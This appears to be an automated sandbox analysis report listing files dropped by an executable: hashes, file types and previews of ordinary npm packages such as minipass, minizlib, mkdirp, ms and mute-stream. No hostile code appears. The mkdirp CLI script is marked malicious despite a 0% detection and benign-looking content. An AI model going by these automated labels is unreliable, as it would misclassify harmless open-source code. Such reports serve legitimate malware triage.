              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.Minipass = exports.isWritable = exports.isReadable = exports.isStream = void 0;.const proc = typeof process === 'object' && process. ? process. : {. stdout: null,. stderr: null,. };.const events_1 = require("events");.const stream_1 = __importDefault(require("stream"));.const string_decoder_1 = require("string_decoder");./**. * Return true if the argument is a Minipass stream, Node stream, or something. * else that Minipass can interact with.. */.const isStream = (s) => !!s &&. typeof s === 'object' &&. (s instanceof Minipass ||. s instanceof stream_1.default ||. (0, exports.isReadable)(s) ||. (0, exports.isWritable)(s));.exports.isStream = isStream;./**. * Return true if the argument is a valid {@link Minipass.Reada
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1944
              Entropy (8bit):4.643984935861022
              Encrypted:false
              SSDEEP:
              MD5:279CF9F71B29A4AC398859A20EA21613
              SHA1:415D7C00B1183FE401C317A76E01FDAB5A93F080
              SHA-256:0D03F4055FE0EA82AF3A7A19CD90F9679DD8168F3556D3D4BAB3AE9C9DB942A2
              SHA-512:EEA92E66BC3BD0B1E4472AE7CC5E07D7D75590CDB397CBCF7E1C232B4419E88138CD2CC76A99C6C5BBACE543DEFA9620E71CD1922DA9384E90E5C0692616A2E4
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "minipass",. "version": "7.0.4",. "description": "minimal implementation of a PassThrough stream",. "main": "./dist/commonjs/index.js",. "types": "./dist/commonjs/index.d.ts",. "type": "module",. "tshy": {. "main": true,. "exports": {. "./package.json": "./package.json",. ".": "./src/index.ts". }. },. "exports": {. "./package.json": "./package.json",. ".": {. "import": {. "types": "./dist/esm/index.d.ts",. "default": "./dist/esm/index.js". },. "require": {. "types": "./dist/commonjs/index.d.ts",. "default": "./dist/commonjs/index.js". }. }. },. "files": [. "dist". ],. "scripts": {. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags",. "prepare": "tshy",. "pretest": "npm run prepare",. "presnap": "npm run prepare",. "test": "tap",. "snap": "tap",. "format": "prettier --write . --loglevel warn",. "type
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1297
              Entropy (8bit):5.103525211235431
              Encrypted:false
              SSDEEP:
              MD5:D8A0CA0C46BFA01DB064FA836F550966
              SHA1:73A4B83EE6DC57F6BAEC7A105C4E842688200A3B
              SHA-256:87A4800D70DE7EDC1640351A045BB588FCAA958093FCD1B3EE878388ABCEB818
              SHA-512:EAB50E24303772FA982A6AFA0FAC1F642BD81D11100A0D8ACA8BE0F26AE014D969D4E6B8F31FCF5E21146A1CFA9199FFC284C59183DBF26BC451933D387E89B6
              Malicious:false
              Reputation:unknown
              Preview:Minizlib was created by Isaac Z. Schlueter..It is a derivative work of the Node.js project...""".Copyright Isaac Z. Schlueter and Contributors.Copyright Node.js contributors. All rights reserved..Copyright Joyent, Inc. and other Node contributors. All rights reserved...Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTIC
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3740
              Entropy (8bit):5.074223955119986
              Encrypted:false
              SSDEEP:
              MD5:D473F80705D7AE9D9DAA0DA574428707
              SHA1:C2FD57A9FC1D15DB105EA88ABDEFC67B912612AB
              SHA-256:D4DF7BAE3260DEC937F377C259A098987954C3EBBCF4145ADACF598DACFB90FB
              SHA-512:0678F65CAEE7B16A649091AAB1BDC9594D6378641BA836C1A1E48A1F797E3D8850A78BF6719AB9FECB6D2B48C6837CDE1DEAC50935F703FA3920ED1D2EFA41B6
              Malicious:false
              Reputation:unknown
              Preview:// Update with any zlib constants that are added or changed in the future..// Node v6 didn't export this, so we just hard code the version and rely.// on all the other hard-coded values from zlib v4736. When node v6.// support drops, we can just export the realZlibConstants object..const realZlibConstants = require('zlib').constants ||. /* istanbul ignore next */ { ZLIB_VERNUM: 4736 }..module.exports = Object.freeze(Object.assign(Object.create(null), {. Z_NO_FLUSH: 0,. Z_PARTIAL_FLUSH: 1,. Z_SYNC_FLUSH: 2,. Z_FULL_FLUSH: 3,. Z_FINISH: 4,. Z_BLOCK: 5,. Z_OK: 0,. Z_STREAM_END: 1,. Z_NEED_DICT: 2,. Z_ERRNO: -1,. Z_STREAM_ERROR: -2,. Z_DATA_ERROR: -3,. Z_MEM_ERROR: -4,. Z_BUF_ERROR: -5,. Z_VERSION_ERROR: -6,. Z_NO_COMPRESSION: 0,. Z_BEST_SPEED: 1,. Z_BEST_COMPRESSION: 9,. Z_DEFAULT_COMPRESSION: -1,. Z_FILTERED: 1,. Z_HUFFMAN_ONLY: 2,. Z_RLE: 3,. Z_FIXED: 4,. Z_DEFAULT_STRATEGY: 0,. DEFLATE: 1,. INFLATE: 2,. GZIP: 3,. GUNZIP: 4,. DEFLATERAW: 5,. INFLATERAW: 6
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):9444
              Entropy (8bit):4.772608234123065
              Encrypted:false
              SSDEEP:
              MD5:BC17FFA5C57825335FDCCD87D76CF5E2
              SHA1:F4554C20A8BB452CC19C97052416D634586D7632
              SHA-256:038B01F7982845D55B30F7888698DD0D34049E99C9F6913D424E3BA41323654D
              SHA-512:AA081E5EFFCB955D247B1B51D7F65F4357197A95ACCAE1B7F2E0E90C6B4DBFF21A303E950901DDA900EA100D79807280474C729B4F9BBC600FA26CD1C0FF2EF6
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const assert = require('assert').const Buffer = require('buffer').Buffer.const realZlib = require('zlib')..const constants = exports.constants = require('./constants.js').const Minipass = require('minipass')..const OriginalBufferConcat = Buffer.concat..const _superWrite = Symbol('_superWrite').class ZlibError extends Error {. constructor (err) {. super('zlib: ' + err.message). this.code = err.code. this.errno = err.errno. /* istanbul ignore if */. if (!this.code). this.code = 'ZLIB_ERROR'.. this.message = 'zlib: ' + err.message. Error.captureStackTrace(this, this.constructor). }.. get name () {. return 'ZlibError'. }.}..// the Zlib class they all inherit from.// This thing manages the queue of requests, and returns.// true or false if there is anything in the queue when.// you call the .write() method..const _opts = Symbol('opts').const _flushFlag = Symbol('flushFlag').const _finishFlushFlag = Symbol('finishFlushFlag').const _fullFlushFlag
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):907
              Entropy (8bit):4.66820989838977
              Encrypted:false
              SSDEEP:
              MD5:18063883E703C0F5DA4521ECD2FEDF57
              SHA1:5745585933310F7807EEBD4E9BC01E2D83BA160D
              SHA-256:DD7D78CAF139BA9228A84BEE7BB5FA7B92E4D332B836F07BDF1B0F9E78FA6340
              SHA-512:37E2253E56E4BC7D4AF51D5625E4CFF7A652AA92D02804DEDE49E2E165B2C2A28DC3C31EA3F8D8F23EDF8BFF52FF4E31EF72DD0187B169C523B382B711783B58
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "minizlib",. "version": "2.1.2",. "description": "A small fast zlib stream built on [minipass](http://npm.im/minipass) and Node.js's zlib binding.",. "main": "index.js",. "dependencies": {. "minipass": "^3.0.0",. "yallist": "^4.0.0". },. "scripts": {. "test": "tap test/*.js --100 -J",. "preversion": "npm test",. "postversion": "npm publish",. "postpublish": "git push origin --all; git push origin --tags". },. "repository": {. "type": "git",. "url": "git+https://github.com/isaacs/minizlib.git". },. "keywords": [. "zlib",. "gzip",. "gunzip",. "deflate",. "inflate",. "compression",. "zip",. "unzip". ],. "author": "Isaac Z. Schlueter <i@izs.me> (http://blog.izs.me/)",. "license": "MIT",. "devDependencies": {. "tap": "^14.6.9". },. "files": [. "index.js",. "constants.js". ],. "engines": {. "node": ">= 8". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1166
              Entropy (8bit):5.109425046752047
              Encrypted:false
              SSDEEP:
              MD5:F653359CC2BE3FF55AA601D58D84C808
              SHA1:125D6F5A2D14E90BD60C0B6FA60C4376ECBFFE54
              SHA-256:144C935613E823350F7798D19DA78B5E8315A79AF5C2A3744FD85CD61BAF07EE
              SHA-512:45B61A4493E9C562F3D3A8B82D86B2AA0C6473DBCE8CEEF080100965B6829434E6F353783E90160B489FC5359BA39F73EF15258A7631F4E23C5A32C39594EF76
              Malicious:false
              Reputation:unknown
              Preview:Copyright James Halliday (mail@substack.net) and Isaac Z. Schlueter (i@izs.me)..This project is free software released under the MIT license:..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:a /usr/bin/env node script, ASCII text executable
              Category:dropped
              Size (bytes):1830
              Entropy (8bit):4.762422042556923
              Encrypted:false
              SSDEEP:
              MD5:85A9219247B622BD411473774F5DA34B
              SHA1:CC9B8C09B603C7AB51FC57F58B23331DA157DC5F
              SHA-256:A5BF5E02584A7D72E4954F45E6EFD60965315A78237179072DE58CD8A161B8B6
              SHA-512:B3F9658691379F25625AA6E8AE6C460714DF1DD361ED40C65BC7BCDA211A3C6B48DD1BD3182E9C9BF02FE2C29243EC09C7EAA9B749E2ADD3658E7AA2D75C5E40
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env node..const usage = () => `.usage: mkdirp [DIR1,DIR2..] {OPTIONS}.. Create each supplied directory including any necessary parent directories. that don't yet exist... If the directory already exists, do nothing...OPTIONS are:.. -m<mode> If a directory needs to be created, set the mode as an octal. --mode=<mode> permission string... -v --version Print the mkdirp version number.. -h --help Print this helpful banner.. -p --print Print the first directories created for each path provided.. --manual Use manual implementation, even if native is available.`..const dirs = [].const opts = {}.let print = false.let dashdash = false.let manual = false.for (const arg of process.argv.slice(2)) {. if (dashdash). dirs.push(arg). else if (arg === '--'). dashdash = true. else if (arg === '--manual'). manual = true. else if (/^-h/.test(arg) || /^--help/.test(arg)) {. console.log(usage()). process.exit(0). } else if (arg === '-v' || arg =
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1029
              Entropy (8bit):4.855087477648871
              Encrypted:false
              SSDEEP:
              MD5:7F2AA6DC8822BA39D291CB2E24FB9E3B
              SHA1:4B5CC1F1765ACAB5C676983000BDAEC282643DC7
              SHA-256:FD78D08648851E2DB1B19E1271A90AD55B640D0B6AE2B20AD11C94AEEC847B33
              SHA-512:C7D5927564D6268A156D6066779C1F48425898378E8FC5109B0557A066A333C4F2AD54B093CAEBB9CEEE4A42469C807FFFE6A0E609B27E1DCF5E9A49347396D7
              Malicious:false
              Reputation:unknown
              Preview:const optsArg = require('./lib/opts-arg.js').const pathArg = require('./lib/path-arg.js')..const {mkdirpNative, mkdirpNativeSync} = require('./lib/mkdirp-native.js').const {mkdirpManual, mkdirpManualSync} = require('./lib/mkdirp-manual.js').const {useNative, useNativeSync} = require('./lib/use-native.js')...const mkdirp = (path, opts) => {. path = pathArg(path). opts = optsArg(opts). return useNative(opts). ? mkdirpNative(path, opts). : mkdirpManual(path, opts).}..const mkdirpSync = (path, opts) => {. path = pathArg(path). opts = optsArg(opts). return useNativeSync(opts). ? mkdirpNativeSync(path, opts). : mkdirpManualSync(path, opts).}..mkdirp.sync = mkdirpSync.mkdirp.native = (path, opts) => mkdirpNative(pathArg(path), optsArg(opts)).mkdirp.manual = (path, opts) => mkdirpManual(pathArg(path), optsArg(opts)).mkdirp.nativeSync = (path, opts) => mkdirpNativeSync(pathArg(path), optsArg(opts)).mkdirp.manualSync = (path, opts) => mkdirpManualSync(pathArg(path), optsArg(opt
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):763
              Entropy (8bit):4.555066010183802
              Encrypted:false
              SSDEEP:
              MD5:B23628E3D83391F3631E04E049A158C6
              SHA1:98D0595FB390E763DB9D6887244B0772D0B4E7A6
              SHA-256:743B7FD8FD5EC11DD6A71800650A65079F5BD3F08CBABB5C8DFADF06D138D755
              SHA-512:8D59D6F84A5C7B9DB3796A68CF21E73FDD7BACC4CBBF3EE975FA690A3A5711C6D7DE7EDE2F04E2BFA9B116D8E631B3D8479D56FB4AA2ECD9321B8B7631564F4A
              Malicious:false
              Reputation:unknown
              Preview:const {dirname} = require('path')..const findMade = (opts, parent, path = undefined) => {. // we never want the 'made' return value to be a root directory. if (path === parent). return Promise.resolve().. return opts.statAsync(parent).then(. st => st.isDirectory() ? path : undefined, // will fail later. er => er.code === 'ENOENT'. ? findMade(opts, dirname(parent), parent). : undefined. ).}..const findMadeSync = (opts, parent, path = undefined) => {. if (path === parent). return undefined.. try {. return opts.statSync(parent).isDirectory() ? path : undefined. } catch (er) {. return er.code === 'ENOENT'. ? findMadeSync(opts, dirname(parent), parent). : undefined. }.}..module.exports = {findMade, findMadeSync}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1610
              Entropy (8bit):4.550094215173024
              Encrypted:false
              SSDEEP:
              MD5:B6A5DE09B9A14AD21157947B72567BBD
              SHA1:84D7358CB99C1CE8365D194119604A28C4C0C2DC
              SHA-256:492BEDCD991014695803A3788F6C520DF9C9B46FC315C9237DEBFDB713D75AAF
              SHA-512:02B9767BE047B31B896646D3EBF78C814DDE5F4FAA6E18EB19B666437FD62B6F7F8B328B7A2657C3DEDB0D0023BF7CA5C294EF0F849C106F6BB3C0513E3A030F
              Malicious:false
              Reputation:unknown
              Preview:const {dirname} = require('path')..const mkdirpManual = (path, opts, made) => {. opts.recursive = false. const parent = dirname(path). if (parent === path) {. return opts.mkdirAsync(path, opts).catch(er => {. // swallowed by recursive implementation on posix systems. // any other error is a failure. if (er.code !== 'EISDIR'). throw er. }). }.. return opts.mkdirAsync(path, opts).then(() => made || path, er => {. if (er.code === 'ENOENT'). return mkdirpManual(parent, opts). .then(made => mkdirpManual(path, opts, made)). if (er.code !== 'EEXIST' && er.code !== 'EROFS'). throw er. return opts.statAsync(path).then(st => {. if (st.isDirectory()). return made. else. throw er. }, () => { throw er }). }).}..const mkdirpManualSync = (path, opts, made) => {. const parent = dirname(path). opts.recursive = false.. if (parent === path) {. try {. return opts.mkdirSync(path, opts). } catch (er) {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):969
              Entropy (8bit):4.641950605689418
              Encrypted:false
              SSDEEP:
              MD5:416245D596FD10F00704362918482D47
              SHA1:C471C379855ED0EAC2E47537D647B1F9C4D7A70D
              SHA-256:BB01894BCA455D7CC47C4957687293EF0FA740FC50E9AF1351517E7AD667D00A
              SHA-512:52A36033D83E9E26D845560AFAA06536A83A01F21D8FFA39E06A76908C6C8C99B19AFFAB46DC4474FD7BE9ECDFD1B0E70426581E3647BC35A9764CAB499DCDA7
              Malicious:false
              Reputation:unknown
              Preview:const {dirname} = require('path').const {findMade, findMadeSync} = require('./find-made.js').const {mkdirpManual, mkdirpManualSync} = require('./mkdirp-manual.js')..const mkdirpNative = (path, opts) => {. opts.recursive = true. const parent = dirname(path). if (parent === path). return opts.mkdirAsync(path, opts).. return findMade(opts, path).then(made =>. opts.mkdirAsync(path, opts).then(() => made). .catch(er => {. if (er.code === 'ENOENT'). return mkdirpManual(path, opts). else. throw er. })).}..const mkdirpNativeSync = (path, opts) => {. opts.recursive = true. const parent = dirname(path). if (parent === path). return opts.mkdirSync(path, opts).. const made = findMadeSync(opts, path). try {. opts.mkdirSync(path, opts). return made. } catch (er) {. if (er.code === 'ENOENT'). return mkdirpManualSync(path, opts). else. throw er. }.}..module.exports = {mkdirpNative, mkdirpNativeSync}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):784
              Entropy (8bit):4.573676235245015
              Encrypted:false
              SSDEEP:
              MD5:02186675D27F125F4CF0A25F62F66F95
              SHA1:9A156CB053789AE9AFC98EDB0EC511CDCACDF0E8
              SHA-256:A9A3E4F1700201C1ECB1D5EBB33D6DA69ECF3DB23546C4D077C730AE42A0A6A9
              SHA-512:3078A6FF5997B321B00033FEA93676EA025FA700D136F8169F84576048E484485047829C53955016487924C7C84BE428AE28184552F331B06E5E85BA67C47E00
              Malicious:false
              Reputation:unknown
              Preview:const { promisify } = require('util').const fs = require('fs').const optsArg = opts => {. if (!opts). opts = { mode: 0o777, fs }. else if (typeof opts === 'object'). opts = { mode: 0o777, fs, ...opts }. else if (typeof opts === 'number'). opts = { mode: opts, fs }. else if (typeof opts === 'string'). opts = { mode: parseInt(opts, 8), fs }. else. throw new TypeError('invalid options argument').. opts.mkdir = opts.mkdir || opts.fs.mkdir || fs.mkdir. opts.mkdirAsync = promisify(opts.mkdir). opts.stat = opts.stat || opts.fs.stat || fs.stat. opts.statAsync = promisify(opts.stat). opts.statSync = opts.statSync || opts.fs.statSync || fs.statSync. opts.mkdirSync = opts.mkdirSync || opts.fs.mkdirSync || fs.mkdirSync. return opts.}.module.exports = optsArg.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):730
              Entropy (8bit):4.872008532840894
              Encrypted:false
              SSDEEP:
              MD5:BB4E73574C5039AC56A7233A8CDF652C
              SHA1:56EA8C6FB15056FC0F5AE64B236638611E9AB0FB
              SHA-256:93ABAFB7A89F0FE00C662CD8F4100F4AEEF7D5B0A068B8A9AF81B38F03D21325
              SHA-512:4A6C0E3004A9EB81F9CDDE60E8CEF7DB1E0B1DF273EB75548C3C36ED217606138921194B91117D7A030A0F1055262E56D43689804D66A04A23DDB3655EBFF18E
              Malicious:false
              Reputation:unknown
              Preview:const platform = process.env.__TESTING_MKDIRP_PLATFORM__ || process.platform.const { resolve, parse } = require('path').const pathArg = path => {. if (/\0/.test(path)) {. // simulate same failure that node raises. throw Object.assign(. new TypeError('path must be a string without null bytes'),. {. path,. code: 'ERR_INVALID_ARG_VALUE',. }. ). }.. path = resolve(path). if (platform === 'win32') {. const badWinChars = /[*|"<>?:]/. const {root} = parse(path). if (badWinChars.test(path.substr(root.length))) {. throw Object.assign(new Error('Illegal characters in path.'), {. path,. code: 'EINVAL',. }). }. }.. return path.}.module.exports = pathArg.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):448
              Entropy (8bit):5.105102335306996
              Encrypted:false
              SSDEEP:
              MD5:43D7B801E229D75BD6AF53F9E0DD8B2C
              SHA1:DFF74435E5B488880D7A887A5B9B3BEBF45A70F3
              SHA-256:FED1E14F4D3A650493666697889E77EBB3BE6CCB6054E9F55197566D1CF0EEA8
              SHA-512:4B65A15D113095395DD6E4139E7AF7334E63CA4F139B702BCE6C3CF30AB027D71B5F38CCB27D6A106CF27FA78A30FF94B1BB1708E6FE5B6A410BCDF070063436
              Malicious:false
              Reputation:unknown
              Preview:const fs = require('fs')..const version = process.env.__TESTING_MKDIRP_NODE_VERSION__ || process.version.const versArr = version.replace(/^v/, '').split('.').const hasNative = +versArr[0] > 10 || +versArr[0] === 10 && +versArr[1] >= 12..const useNative = !hasNative ? () => false : opts => opts.mkdir === fs.mkdir.const useNativeSync = !hasNative ? () => false : opts => opts.mkdirSync === fs.mkdirSync..module.exports = {useNative, useNativeSync}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):804
              Entropy (8bit):4.486429167607522
              Encrypted:false
              SSDEEP:
              MD5:6A1F8790C34F10F8E970819EEF841CD4
              SHA1:46DA394A85C88F3288E19CCD89C03174E1360C52
              SHA-256:A7357D86BE1FD6CD9AC7BC78C4D49155CE08C6087A2378FAE5B15CE2EB34B9A2
              SHA-512:B4D082F4508C619AC216BC1A33A5596A1400DDD3DD3AF2BB5C0F4D81F1EFA79719C758DC333427BE6AB491E0DAD9512A2C6204081CB1863430E6B87991546F6B
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "mkdirp",. "description": "Recursively mkdir, like `mkdir -p`",. "version": "1.0.4",. "main": "index.js",. "keywords": [. "mkdir",. "directory",. "make dir",. "make",. "dir",. "recursive",. "native". ],. "repository": {. "type": "git",. "url": "https://github.com/isaacs/node-mkdirp.git". },. "scripts": {. "test": "tap",. "snap": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "postpublish": "git push origin --follow-tags". },. "tap": {. "check-coverage": true,. "coverage-map": "map.js". },. "devDependencies": {. "require-inject": "^1.4.4",. "tap": "^14.10.7". },. "bin": "bin/cmd.js",. "license": "MIT",. "engines": {. "node": ">=10". },. "files": [. "bin",. "lib",. "index.js". ].}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3024
              Entropy (8bit):4.754385499254461
              Encrypted:false
              SSDEEP:
              MD5:83C46187ED7B1E33A178F4C531C4EA81
              SHA1:EA869663486F513CC4D1CA8312ED52A165C417FA
              SHA-256:E5F0B6A946A9B2B356A28557728410717DF54EA2F599EDB619F9839DF6B7B0E9
              SHA-512:51B45089A53A23C12E28EB889396E2FA71B95085BAA5AC34D71FFB625131BF2FEC3AE98EFEAE537656E20EA257F44E089BCEBC9AD54CF672CDE852102E43E153
              Malicious:false
              Reputation:unknown
              Preview:/**. * Helpers.. */..var s = 1000;.var m = s * 60;.var h = m * 60;.var d = h * 24;.var w = d * 7;.var y = d * 365.25;../**. * Parse or format the given `val`.. *. * Options:. *. * - `long` verbose formatting [false]. *. * @param {String|Number} val. * @param {Object} [options]. * @throws {Error} throw an error if val is not a non-empty string or a number. * @return {String|Number}. * @api public. */..module.exports = function (val, options) {. options = options || {};. var type = typeof val;. if (type === 'string' && val.length > 0) {. return parse(val);. } else if (type === 'number' && isFinite(val)) {. return options.long ? fmtLong(val) : fmtShort(val);. }. throw new Error(. 'val is not a non-empty string or a valid number. val=' +. JSON.stringify(val). );.};../**. * Parse the given `str` and return milliseconds.. *. * @param {String} str. * @return {Number}. * @api private. */..function parse(str) {. str = String(str);. if (str.length > 100) {. return;. }
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1079
              Entropy (8bit):5.100083983397303
              Encrypted:false
              SSDEEP:
              MD5:2B8BC52AE6B7BA58E1629DEABD53986F
              SHA1:AC646EA4EC65CD1FEAC459A194A15A52D147BDCF
              SHA-256:1662FAE9B5314D11CF51284E2DCD1F006A354F7343F08712A730FCFF9A359801
              SHA-512:99536ECE73C2F788FA74C42BFABC044D3966812FFB9A9D30BB9183371999BB4067B26C1B36D40738444A37C341FD5B9B5E833C9D40884B99D39147E5A9E3F3DE
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) 2020 Vercel, Inc...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):732
              Entropy (8bit):4.430071999887843
              Encrypted:false
              SSDEEP:
              MD5:A682078F64A677DDAD1F50307A14B678
              SHA1:C290EB97736177176D071DA4AC855AB995685C97
              SHA-256:1A6B4D9739790C0B94AB96C8CC0507E281C164C311FF4FBF5E57FB8D26290B40
              SHA-512:9E16C5689B57275F4ED624C6954F12299706E2372A60F6173421800DA5EDF9ED52E52FD2B0798F826CDDBADE6CA19A6E6A996960C6697CC2DA0DDECB36409520
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "ms",. "version": "2.1.3",. "description": "Tiny millisecond conversion utility",. "repository": "vercel/ms",. "main": "./index",. "files": [. "index.js". ],. "scripts": {. "precommit": "lint-staged",. "lint": "eslint lib/* bin/*",. "test": "mocha tests.js". },. "eslintConfig": {. "extends": "eslint:recommended",. "env": {. "node": true,. "es6": true. }. },. "lint-staged": {. "*.js": [. "npm run lint",. "prettier --single-quote --write",. "git add". ]. },. "license": "MIT",. "devDependencies": {. "eslint": "4.18.2",. "expect.js": "0.3.1",. "husky": "0.14.3",. "lint-staged": "5.0.0",. "mocha": "4.0.1",. "prettier": "2.0.5". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2841
              Entropy (8bit):4.448909276895926
              Encrypted:false
              SSDEEP:
              MD5:494560F8C177A27306C2761FEECFB0BF
              SHA1:EEBF9C87167DF88FD2175F6677C37226A6AECA3A
              SHA-256:F64DDDB569E875FE5F0CB0AA8AC824FDCAD7717293FE15B9A58159A61F60921C
              SHA-512:BA7D0A4198C8D09822CE51304EF0546F9E297B5A48B07073ABBCDCB81C6C8A7C673FB7A32D72F3EF029A81117CF18EC152B71961246020AA8C952075BC69E8E0
              Malicious:false
              Reputation:unknown
              Preview:const Stream = require('stream')..class MuteStream extends Stream {. #isTTY = null.. constructor (opts = {}) {. super(opts). this.writable = this.readable = true. this.muted = false. this.on('pipe', this._onpipe). this.replace = opts.replace.. // For readline-type situations. // This much at the start of a line being redrawn after a ctrl char. // is seen (such as backspace) won't be redrawn as the replacement. this._prompt = opts.prompt || null. this._hadControl = false. }.. #destSrc (key, def) {. if (this._dest) {. return this._dest[key]. }. if (this._src) {. return this._src[key]. }. return def. }.. #proxy (method, ...args) {. if (typeof this._dest?.[method] === 'function') {. this._dest[method](...args). }. if (typeof this._src?.[method] === 'function') {. this._src[method](...args). }. }.. get isTTY () {. if (this.#isTTY !== null) {. return this.#isTTY. }. return this.#destSrc('isTTY'
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1163
              Entropy (8bit):4.668278088644939
              Encrypted:false
              SSDEEP:
              MD5:6042BA806BF170C7CFFDFA7D3A378583
              SHA1:3114F5F9201F3C2205F304A3E3C5BD2836713776
              SHA-256:900651D0BE09675BEF89932E088B9AFD557B68C123D72855BF45DC48FF5F2712
              SHA-512:B08E064663AEFAF349045CFE16A42C1E87EDBEE7E7D308090C6DBFE381DEE51A7AD05AA8B2150C01DA738B49CBDD46BE311353F7759CE9830A7B685C3879F6CB
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "mute-stream",. "version": "1.0.0",. "main": "lib/index.js",. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.11.0",. "tap": "^16.3.0". },. "scripts": {. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "snap": "tap",. "posttest": "npm run lint". },. "repository": {. "type": "git",. "url": "https://github.com/npm/mute-stream.git". },. "keywords": [. "mute",. "stream",. "pipe". ],. "author": "GitHub Inc.",. "license": "ISC",. "description": "Bytes go in, but they don't come out (when muted).",. "files": [. "bin/",. "lib/". ],. "tap": {. "statements": 70,. "branches": 60,. "functions": 81,. "lines": 70,. "nyc-arg": [. "--exclude",. "tap-snapshots/**". ]. },. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2499
              Entropy (8bit):4.724481905020091
              Encrypted:false
              SSDEEP:
              MD5:DDC51C280EC46D9811670F9D184AF3E5
              SHA1:2FE55382F30DEC2AE79C116A280CB5DFA51B9772
              SHA-256:6B25039B6A40F7FCB7EB6DC891418D154C4B4154284F58C6BFFCB10AD7587A6D
              SHA-512:8C34483B20AFD92FC17C51A6DF6227E5DCA5B4D8EEED0989DD34371951CB87D323F7BCBF59B9CBC602AE521A8495C18553652189600E9735396A9AD62893D3D1
